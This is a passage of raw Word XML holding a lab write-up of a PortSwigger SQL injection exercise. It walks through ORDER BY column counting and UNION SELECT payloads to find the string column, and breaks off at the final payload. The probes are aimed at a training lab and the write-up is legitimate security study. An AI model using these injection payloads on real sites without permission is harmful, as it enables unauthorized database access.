    </w:p>
    <w:p w14:paraId="089D241E" w14:textId="77777777" w:rsidR="002F3F26" w:rsidRDefault="002F3F26" w:rsidP="003B7E47"/>
    <w:p w14:paraId="1A491F14" w14:textId="5CC4C0F6" w:rsidR="003B7E47" w:rsidRDefault="003B7E47" w:rsidP="003B7E47">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">4. Lab description (as per </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>portswigger</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> lab website)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0337C36D" w14:textId="77777777" w:rsidR="003B7E47" w:rsidRDefault="003B7E47" w:rsidP="003B7E47">
      <w:r>
        <w:t>This lab contains a SQL injection vulnerability in the product category filter. The results from the query are returned in the application's response, so you can use a UNION attack to retrieve data from other tables. To construct such an attack, you first need to determine the number of columns returned by the query. You can do this using a technique you learned in a previous lab. The next step is to identify a column that is compatible with string data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="611775DF" w14:textId="77777777" w:rsidR="003B7E47" w:rsidRDefault="003B7E47" w:rsidP="003B7E47">
      <w:r>
        <w:t>The lab will provide a random value that you need to make appear within the query results. To solve the lab, perform a SQL injection UNION attack that returns an additional row containing the value provided. This technique helps you determine which columns are compatible with string data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B10C27B" w14:textId="176581F0" w:rsidR="003B7E47" w:rsidRDefault="003B7E47" w:rsidP="003B7E47">
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">5. </w:t>
      </w:r>
      <w:r w:rsidRPr="00863D55">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>End Goal</w:t>
      </w:r>
      <w:r w:rsidRPr="00863D55">
        <w:t xml:space="preserve"> - </w:t>
      </w:r>
      <w:r>
        <w:t>D</w:t>
      </w:r>
      <w:r w:rsidRPr="003B7E47">
        <w:t>isplaying the given string in the page</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21795A03" w14:textId="77777777" w:rsidR="002F3F26" w:rsidRDefault="002F3F26" w:rsidP="003B7E47"/>
    <w:p w14:paraId="2BCC3F2D" w14:textId="49B735DB" w:rsidR="003B7E47" w:rsidRPr="004D516A" w:rsidRDefault="003B7E47" w:rsidP="003B7E47">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>6</w:t>
      </w:r>
      <w:r w:rsidRPr="004D516A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Analysis</w:t>
      </w:r>
      <w:r w:rsidR="00F378AC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> steps:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55A07E5F" w14:textId="77777777" w:rsidR="003B7E47" w:rsidRPr="004D516A" w:rsidRDefault="003B7E47" w:rsidP="003B7E47">
      <w:r w:rsidRPr="004D516A">
        <w:t xml:space="preserve">a. </w:t>
      </w:r>
      <w:r w:rsidRPr="004D516A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Confirmed SQL injection vulnerability</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="091CDC9E" w14:textId="77777777" w:rsidR="003B7E47" w:rsidRPr="004D516A" w:rsidRDefault="003B7E47" w:rsidP="003B7E47">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="004D516A">
        <w:t xml:space="preserve">Injected a single quote (') at the end of the URL after selecting </w:t>
      </w:r>
      <w:r>
        <w:t>any</w:t>
      </w:r>
      <w:r w:rsidRPr="004D516A">
        <w:t xml:space="preserve"> category.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="334849F4" w14:textId="77777777" w:rsidR="003B7E47" w:rsidRPr="004D516A" w:rsidRDefault="003B7E47" w:rsidP="003B7E47">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="004D516A">
        <w:t xml:space="preserve">Application responded with </w:t>
      </w:r>
      <w:r w:rsidRPr="004D516A">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Internal Server Error</w:t>
      </w:r>
      <w:r w:rsidRPr="004D516A">
        <w:t>, confirming SQL syntax error → hence injectable.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7749E416" w14:textId="77777777" w:rsidR="003B7E47" w:rsidRPr="004D516A" w:rsidRDefault="003B7E47" w:rsidP="003B7E47">
      <w:r>
        <w:pict w14:anchorId="0D4B6667">
          <v:rect id="_x0000_i1029" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="68C02703" w14:textId="77777777" w:rsidR="003B7E47" w:rsidRPr="004D516A" w:rsidRDefault="003B7E47" w:rsidP="003B7E47">
      <w:r w:rsidRPr="004D516A">
        <w:t xml:space="preserve">b. </w:t>
      </w:r>
      <w:r w:rsidRPr="004D516A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Determined number of columns</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EA58438" w14:textId="77777777" w:rsidR="003B7E47" w:rsidRPr="004D516A" w:rsidRDefault="003B7E47" w:rsidP="003B7E47">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="004D516A">
        <w:t>Payloads tested in category filter URL:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ECE21ED" w14:textId="2F93667E" w:rsidR="003B7E47" w:rsidRDefault="003B7E47" w:rsidP="003B7E47">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="004D516A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>' ORDER BY 1--</w:t>
      </w:r>
      <w:r w:rsidRPr="004D516A">
        <w:t xml:space="preserve"> → worked (sorted by 1st column</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>i.e</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> here, </w:t>
      </w:r>
      <w:r w:rsidR="00E22CCC">
        <w:t xml:space="preserve">maybe </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00E22CCC">
        <w:t>a</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00E22CCC">
        <w:t xml:space="preserve"> id column as it isn’t visible</w:t>
      </w:r>
      <w:r w:rsidRPr="004D516A">
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64F842CF" w14:textId="060E9C57" w:rsidR="003B7E47" w:rsidRDefault="003B7E47" w:rsidP="003B7E47">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA2406">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Screenshot</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> 1</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2406">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2406">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="00E94F8E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="799078BD" wp14:editId="0D1F2BB1">
            <wp:extent cx="5731510" cy="2835910"/>
            <wp:effectExtent l="0" t="0" r="2540" b="2540"/>
            <wp:docPr id="145355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1217" name="Picture 14535512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2327E481" w14:textId="77777777" w:rsidR="003B7E47" w:rsidRDefault="003B7E47" w:rsidP="003B7E47">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Screenshot 2:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C75F284" w14:textId="5AE8B6F6" w:rsidR="003B7E47" w:rsidRDefault="00E94F8E" w:rsidP="003B7E47">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2CBFEE89" wp14:editId="077420E8">
            <wp:extent cx="5731510" cy="2835910"/>
            <wp:effectExtent l="0" t="0" r="2540" b="2540"/>
            <wp:docPr id="378614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14638" name="Picture 3786146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63E5A0FF" w14:textId="77777777" w:rsidR="003B7E47" w:rsidRPr="004D516A" w:rsidRDefault="003B7E47" w:rsidP="003B7E47">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7B5E37D1" w14:textId="1FF8EEF1" w:rsidR="003B7E47" w:rsidRDefault="003B7E47" w:rsidP="003B7E47">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="004D516A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">' ORDER BY 2-- </w:t>
      </w:r>
      <w:r w:rsidRPr="004D516A">
        <w:t>→ worked (sorted by 2nd column</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>i.e</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> here, the </w:t>
      </w:r>
      <w:r w:rsidR="00E94F8E">
        <w:t>name of the gift items</w:t>
      </w:r>
      <w:r w:rsidRPr="004D516A">
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68903D51" w14:textId="77777777" w:rsidR="003B7E47" w:rsidRPr="00CA2406" w:rsidRDefault="003B7E47" w:rsidP="003B7E47">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA2406">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Screenshot:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="008D37F4" w14:textId="1A352890" w:rsidR="003B7E47" w:rsidRDefault="00E94F8E" w:rsidP="003B7E47">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0461ECA4" wp14:editId="0EAFC062">
            <wp:extent cx="5731510" cy="2835910"/>
            <wp:effectExtent l="0" t="0" r="2540" b="2540"/>
            <wp:docPr id="164608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8609" name="Picture 1646086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44A831DB" w14:textId="77777777" w:rsidR="003B7E47" w:rsidRPr="004D516A" w:rsidRDefault="003B7E47" w:rsidP="003B7E47"/>
    <w:p w14:paraId="038D6A77" w14:textId="55F2427B" w:rsidR="003B7E47" w:rsidRDefault="003B7E47" w:rsidP="003B7E47">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="004D516A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>' ORDER BY 3--</w:t>
      </w:r>
      <w:r w:rsidRPr="004D516A">
        <w:t xml:space="preserve"> → </w:t>
      </w:r>
      <w:r w:rsidR="00E94F8E" w:rsidRPr="004D516A">
        <w:t xml:space="preserve">worked (sorted by </w:t>
      </w:r>
      <w:r w:rsidR="00E34248">
        <w:t>3rd</w:t>
      </w:r>
      <w:r w:rsidR="00E94F8E" w:rsidRPr="004D516A">
        <w:t xml:space="preserve"> column</w:t>
      </w:r>
      <w:r w:rsidR="00E94F8E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00E94F8E">
        <w:t>i.e</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00E94F8E">
        <w:t xml:space="preserve"> here, the </w:t>
      </w:r>
      <w:r w:rsidR="00E34248">
        <w:t>prices</w:t>
      </w:r>
      <w:r w:rsidR="00E94F8E">
        <w:t xml:space="preserve"> of the gift items</w:t>
      </w:r>
      <w:r w:rsidR="00E94F8E" w:rsidRPr="004D516A">
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="633A163E" w14:textId="77777777" w:rsidR="003B7E47" w:rsidRPr="00CA2406" w:rsidRDefault="003B7E47" w:rsidP="003B7E47">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA2406">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Screenshot:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34B8D364" w14:textId="31926EB5" w:rsidR="00923976" w:rsidRDefault="002C0452" w:rsidP="003B7E47">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2E9F8206" wp14:editId="48B85AFC">
            <wp:extent cx="5731510" cy="2835910"/>
            <wp:effectExtent l="0" t="0" r="2540" b="2540"/>
            <wp:docPr id="1907734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4440" name="Picture 19077344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35910"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F3B426C" w14:textId="77777777" w:rsidR="00900ED8" w:rsidRPr="00900ED8" w:rsidRDefault="00923976" w:rsidP="00923976">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00923976">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">' ORDER BY </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidRPr="00923976">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>--</w:t>
      </w:r>
      <w:r w:rsidRPr="004D516A">
        <w:t xml:space="preserve"> → internal server error.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F09D8D1" w14:textId="1EFD8746" w:rsidR="00923976" w:rsidRPr="00923976" w:rsidRDefault="00923976" w:rsidP="00900ED8">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00923976">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Screenshot:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74B54925" w14:textId="5F279ACB" w:rsidR="003B7E47" w:rsidRDefault="00923976" w:rsidP="00923976">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1375"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0D6A55A3" wp14:editId="45B7077D">
            <wp:extent cx="5731510" cy="2618105"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="1200659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9284" name="Picture 12006592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7F40BDBC" w14:textId="77777777" w:rsidR="00923976" w:rsidRPr="004D516A" w:rsidRDefault="00923976" w:rsidP="003B7E47"/>
    <w:p w14:paraId="69C4185C" w14:textId="22559816" w:rsidR="003B7E47" w:rsidRPr="004D516A" w:rsidRDefault="003B7E47" w:rsidP="003B7E47">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="004D516A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Conclusion</w:t>
      </w:r>
      <w:r w:rsidRPr="004D516A">
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="002C0452">
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2406">
        <w:t xml:space="preserve"> – 1 = </w:t>
      </w:r>
      <w:r w:rsidR="002C0452">
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidRPr="004D516A">
        <w:t xml:space="preserve"> columns in query.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22E76E72" w14:textId="77777777" w:rsidR="003B7E47" w:rsidRPr="004D516A" w:rsidRDefault="003B7E47" w:rsidP="003B7E47">
      <w:r>
        <w:pict w14:anchorId="20A440EE">
          <v:rect id="_x0000_i1030" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2384C9E8" w14:textId="77777777" w:rsidR="003B7E47" w:rsidRDefault="003B7E47" w:rsidP="003B7E47">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004D516A">
        <w:t xml:space="preserve">c. </w:t>
      </w:r>
      <w:r w:rsidRPr="004D516A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Checked data type of columns</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05E5A4B0" w14:textId="77777777" w:rsidR="00DA0C1A" w:rsidRDefault="00DA0C1A" w:rsidP="003B7E47">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="38428F7D" w14:textId="77777777" w:rsidR="003B7E47" w:rsidRPr="004D516A" w:rsidRDefault="003B7E47" w:rsidP="003B7E47">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="004D516A">
        <w:t>Payloads used:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C878FD1" w14:textId="43136F1F" w:rsidR="003B7E47" w:rsidRDefault="003B7E47" w:rsidP="003B7E47">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="004D516A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>' UNION SELECT 'a',</w:t>
      </w:r>
      <w:r w:rsidR="00DA0C1A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> NULL,</w:t>
      </w:r>
      <w:r w:rsidRPr="004D516A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> NULL--</w:t>
      </w:r>
      <w:r w:rsidRPr="004D516A">
        <w:t xml:space="preserve"> → </w:t>
      </w:r>
      <w:r w:rsidR="00DA0C1A" w:rsidRPr="00DA0C1A">
        <w:t>the page gives an internal server error, as the 1st column is an integer column(id)</w:t>
      </w:r>
      <w:r w:rsidR="00DA0C1A">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27A523DD" w14:textId="77777777" w:rsidR="003B7E47" w:rsidRPr="00CA2406" w:rsidRDefault="003B7E47" w:rsidP="003B7E47">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA2406">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Screenshots:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="055D8E29" w14:textId="5305D265" w:rsidR="003B7E47" w:rsidRDefault="00DA0C1A" w:rsidP="003B7E47">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="216548EE" wp14:editId="2857792F">
            <wp:extent cx="5731510" cy="2618105"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="609605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05103" name="Picture 6096051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71236933" w14:textId="77777777" w:rsidR="003B7E47" w:rsidRPr="004D516A" w:rsidRDefault="003B7E47" w:rsidP="003B7E47"/>
    <w:p w14:paraId="7687AD1B" w14:textId="4DBEB5F6" w:rsidR="003B7E47" w:rsidRDefault="003B7E47" w:rsidP="003B7E47">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="004D516A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>' UNION SELECT</w:t>
      </w:r>
      <w:r w:rsidR="00DA0C1A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> NULL,</w:t>
      </w:r>
      <w:r w:rsidRPr="004D516A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> 'a', </w:t>
      </w:r>
      <w:r w:rsidR="00DA0C1A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>NULL</w:t>
      </w:r>
      <w:r w:rsidRPr="004D516A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>--</w:t>
      </w:r>
      <w:r w:rsidRPr="004D516A">
        <w:t xml:space="preserve"> → </w:t>
      </w:r>
      <w:r w:rsidR="00DA0C1A" w:rsidRPr="00DA0C1A">
        <w:t>a string "a" appears in the end of the page</w:t>
      </w:r>
      <w:r w:rsidR="00DA0C1A">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E08CE15" w14:textId="77777777" w:rsidR="003B7E47" w:rsidRPr="00CA2406" w:rsidRDefault="003B7E47" w:rsidP="003B7E47">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA2406">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Screenshots:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42D6DD69" w14:textId="3EB0207F" w:rsidR="003B7E47" w:rsidRDefault="00993766" w:rsidP="003B7E47">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="05DB90AA" wp14:editId="786FBA78">
            <wp:extent cx="5731510" cy="2949575"/>
            <wp:effectExtent l="0" t="0" r="2540" b="3175"/>
            <wp:docPr id="1679681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1450" name="Picture 16796814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inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="15698030" w14:textId="77777777" w:rsidR="00993766" w:rsidRPr="00993766" w:rsidRDefault="00993766" w:rsidP="00993766">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00993766">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>' UNION SELECT NULL, 'a', 'a'--</w:t>
      </w:r>
      <w:r w:rsidRPr="004D516A">
        <w:t xml:space="preserve"> → </w:t>
      </w:r>
      <w:r w:rsidRPr="00993766">
        <w:t xml:space="preserve">internal server error as the 3rd column is an </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00993766">
        <w:t>interger</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00993766">
        <w:t xml:space="preserve"> column(price)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25105AFD" w14:textId="1621453A" w:rsidR="00993766" w:rsidRPr="00993766" w:rsidRDefault="00993766" w:rsidP="00993766">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00993766">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Screenshots:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B3C884D" w14:textId="1BECF046" w:rsidR="00993766" w:rsidRDefault="00993766" w:rsidP="003B7E47">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6BCA6420" wp14:editId="28B30FBE">
            <wp:extent cx="5731510" cy="2618105"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="838918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8411" name="Picture 8389184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47F8E08F" w14:textId="77777777" w:rsidR="003B7E47" w:rsidRPr="004D516A" w:rsidRDefault="003B7E47" w:rsidP="003B7E47"/>
    <w:p w14:paraId="31CB9881" w14:textId="699588EE" w:rsidR="003B7E47" w:rsidRPr="004D516A" w:rsidRDefault="003B7E47" w:rsidP="003B7E47">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00993766">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Conclusion</w:t>
      </w:r>
      <w:r w:rsidRPr="004D516A">
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="00993766" w:rsidRPr="00993766">
        <w:t>it means that only the 2nd column is of string data type</w:t>
      </w:r>
      <w:r w:rsidR="00993766">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AA65C6F" w14:textId="77777777" w:rsidR="003B7E47" w:rsidRPr="004D516A" w:rsidRDefault="003B7E47" w:rsidP="003B7E47">
      <w:r>
        <w:pict w14:anchorId="585BB730">
          <v:rect id="_x0000_i1031" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B350AC9" w14:textId="1F81226A" w:rsidR="003B7E47" w:rsidRPr="004D516A" w:rsidRDefault="003B7E47" w:rsidP="003B7E47">
      <w:r w:rsidRPr="004D516A">
        <w:t xml:space="preserve">d. </w:t>
      </w:r>
      <w:r w:rsidRPr="004D516A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Retrieved</w:t>
      </w:r>
      <w:r w:rsidR="00561584">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> given string</w:t>
      </w:r>
      <w:r w:rsidRPr="004D516A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> data </w:t>
      </w:r>
      <w:r w:rsidR="00561584">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>and displayed on the page</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CEB692F" w14:textId="77777777" w:rsidR="003B7E47" w:rsidRPr="004D516A" w:rsidRDefault="003B7E47" w:rsidP="003B7E47">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="004D516A">
        <w:t>Payload:</w:t>
      </w:r>
    </w:p>
